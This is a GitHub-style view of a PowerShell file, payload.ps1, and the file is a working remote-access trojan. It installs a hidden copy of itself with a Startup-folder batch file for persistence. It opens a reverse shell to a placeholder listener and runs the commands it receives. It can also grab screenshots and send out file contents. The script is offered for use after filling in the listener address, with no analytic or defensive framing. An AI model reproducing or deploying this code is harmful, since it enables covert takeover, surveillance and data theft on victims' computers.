-
Notifications
You must be signed in to change notification settings - Fork 1
/
payload.ps1
59 lines (58 loc) · 2.84 KB
/
payload.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# Replace '[LISTENER_ADDRESS]' with your listener's address, and '[LISTENER_PORT]' with your listener's port before serving the file.
$pstr=@'
while($true){
$job=start-job -scriptblock {
function transfer($p){$a=[System.Convert]::ToBase64String([io.file]::ReadAllBytes("$p"));echo "`r`nFILE_START`r`n$a`r`nFILE_END"}
function screenshot(){Add-Type -AssemblyName System.Windows.Forms,System.Drawing;$s=[Windows.Forms.Screen]::AllScreens;$b=[Drawing.Rectangle]::FromLTRB(($s.Bounds.Left|Measure-Object -Minimum).Minimum,($s.Bounds.Top|Measure-Object -Minimum).Minimum,($s.Bounds.Right|Measure-Object -Maximum).Maximum,($s.Bounds.Bottom|Measure-Object -Maximum).Maximum);$i=New-Object System.Drawing.Bitmap([int]$b.width),([int]$b.height);$g=[Drawing.Graphics]::FromImage($i);$g.CopyFromScreen($b.Location,[Drawing.Point]::Empty,$b.size);$i.Save("$env:USERPROFILE\q.png");$g.Dispose();$i.Dispose();transfer("$env:USERPROFILE\q.png");rm -Force "$env:USERPROFILE\q.png"}
function volume($v){$sh = new-object -com wscript.shell;1..50|%{$sh.SendKeys([char]174)};1..$v|%{$sh.SendKeys([char]175)}}
try{
$socket = new-object System.Net.Sockets.TcpClient("[LISTENER_ADDRESS]", [LISTENER_PORT]);
if($socket -eq $null){throw}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.UTF8Encoding;
$writer.Write("Shell access as user $env:username.`r`n");
cd ~
do{
$writer.Write("> ");
$writer.Flush() ;
$read = $null;
while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
$out_split = $out -split " ";
if(!$out.equals("exit") -and !$out.equals("r") -and !$out.equals("rm-all")){
try{
$res = iex $out -ErrorAction Stop
$writer.Write($res -join "`r`n")
} catch {$writer.Write("error")}
$writer.Write("`r`n")
}
if($out.equals("rm-all")){
rm -Force "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\psrunner.bat"
rm -Force "~/pspayload.ps1"
$writer.close()
$socket.close()
stop-process -Force -name powershell
}
} While (!$out.equals("exit"))
$writer.close()
$socket.close()
throw
}catch {
sleep -Seconds 10
}
}
$job | wait-job -timeout 300
$job | stop-job
}
'@
$pstr | set-content "~\pspayload.ps1" -Encoding Ascii
(get-item "~\pspayload.ps1").Attributes += 'Hidden'
$cmdstr= @"
start "" "powershell" -windowstyle hidden "~\pspayload.ps1"
"@
$cmdstr | set-content "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\psrunner.bat" -Encoding Ascii
do{
cmd.exe /c 'start "" "powershell" -windowstyle hidden "~\pspayload.ps1"'
}while((Get-Process powershell).length -le 3)